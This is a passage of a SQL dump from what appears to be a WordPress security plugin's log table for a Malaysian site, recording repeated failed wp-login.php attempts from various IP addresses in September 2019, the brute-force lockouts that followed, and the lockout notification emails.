p-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYjAHkXpgmG5P@iB8kwkQAAAIQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569071872.535\";s:12:\"REQUEST_TIME\";s:10:\"1569071872\";}}','notice','2019-09-21 13:17:53','2019-09-21 13:17:52',17798872,19289672,'https://bintara.com.my/test/wp-login.php',1,0,'144.217.80.190'),(25854,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:17:52\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:17:52\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:32:52\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:32:52\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:17:53','2019-09-21 13:17:52',17883312,19289672,'https://bintara.com.my/test/wp-login.php',1,0,'144.217.80.190'),(25855,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:17:53','2019-09-21 13:17:52',18089256,19289672,'https://bintara.com.my/test/wp-login.php',1,0,'144.217.80.190'),(25856,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYjM3kXpgmG5P@iB8kwsgAAAIg\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.100.249\";s:11:\"REMOTE_PORT\";s:5:\"52530\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYjM3kXpgmG5P@iB8kwsgAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071923.3416\";s:12:\"REQUEST_TIME\";s:10:\"1569071923\";}}','notice','2019-09-21 13:18:44','2019-09-21 13:18:43',17794416,19285128,'https://bintara.com.my/2019/wp-login.php',1,0,'178.128.100.249'),(25857,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:18:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:18:43\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:33:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:33:43\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:18:44','2019-09-21 13:18:43',17879216,19285128,'https://bintara.com.my/2019/wp-login.php',1,0,'178.128.100.249'),(25858,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:18:44','2019-09-21 13:18:43',18084968,19285128,'https://bintara.com.my/2019/wp-login.php',1,0,'178.128.100.249'),(25859,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYjOXkXpgmG5P@iB8kwtwAAAIY\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.180.123\";s:11:\"REMOTE_PORT\";s:5:\"24051\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYjOXkXpgmG5P@iB8kwtwAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071929.7597\";s:12:\"REQUEST_TIME\";s:10:\"1569071929\";}}','notice','2019-09-21 13:18:51','2019-09-21 13:18:50',17798056,19287488,'https://bintara.com.my/wordpress/wp-login.php',1,0,'128.199.180.123'),(25860,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:18:50\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:18:50\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:33:50\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:33:50\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:18:51','2019-09-21 13:18:50',17883096,19287488,'https://bintara.com.my/wordpress/wp-login.php',1,0,'128.199.180.123'),(25861,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:18:51','2019-09-21 13:18:50',18088576,19287488,'https://bintara.com.my/wordpress/wp-login.php',1,0,'128.199.180.123'),(25862,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYjPnkXpgmG5P@iB8kwvAAAAII\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"185.167.101.30\";s:11:\"REMOTE_PORT\";s:5:\"59649\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYjPnkXpgmG5P@iB8kwvAAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071934.9132\";s:12:\"REQUEST_TIME\";s:10:\"1569071934\";}}','notice','2019-09-21 13:18:56','2019-09-21 13:18:55',17794368,19284064,'https://bintara.com.my/blog/wp-login.php',1,0,'185.167.101.30'),(25863,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:18:55\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:18:55\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:33:55\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:33:55\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:18:56','2019-09-21 13:18:55',17879136,19284064,'https://bintara.com.my/blog/wp-login.php',1,0,'185.167.101.30'),(25864,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:18:56','2019-09-21 13:18:55',18084712,19284064,'https://bintara.com.my/blog/wp-login.php',1,0,'185.167.101.30'),(25865,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYjdXkXpgmG5P@iB8kw1gAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"103.209.144.199\";s:11:\"REMOTE_PORT\";s:5:\"49546\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYjdXkXpgmG5P@iB8kw1gAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071989.2156\";s:12:\"REQUEST_TIME\";s:10:\"1569071989\";}}','notice','2019-09-21 13:19:51','2019-09-21 13:19:49',17799008,19290216,'https://bintara.com.my/test/wp-login.php',1,0,'103.209.144.199'),(25866,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:19:49\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:19:49\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:34:49\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:34:49\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:19:51','2019-09-21 13:19:49',17883720,19290216,'https://bintara.com.my/test/wp-login.php',1,0,'103.209.144.199'),(25867,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:19:51','2019-09-21 13:19:49',18089768,19290216,'https://bintara.com.my/test/wp-login.php',1,0,'103.209.144.199'),(25868,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYjinkXpgmG5P@iB8kw8gAAAIw\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"103.221.221.133\";s:11:\"REMOTE_PORT\";s:5:\"37664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYjinkXpgmG5P@iB8kw8gAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072010.7774\";s:12:\"REQUEST_TIME\";s:10:\"1569072010\";}}','notice','2019-09-21 13:20:11','2019-09-21 13:20:11',17799008,19290216,'https://bintara.com.my/2019/wp-login.php',1,0,'103.221.221.133'),(25869,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:20:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:20:11\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:35:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:35:11\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:20:11','2019-09-21 13:20:11',17883720,19290216,'https://bintara.com.my/2019/wp-login.php',1,0,'103.221.221.133'),(25870,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:20:12','2019-09-21 13:20:11',18089768,19290216,'https://bintara.com.my/2019/wp-login.php',1,0,'103.221.221.133'),(25871,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 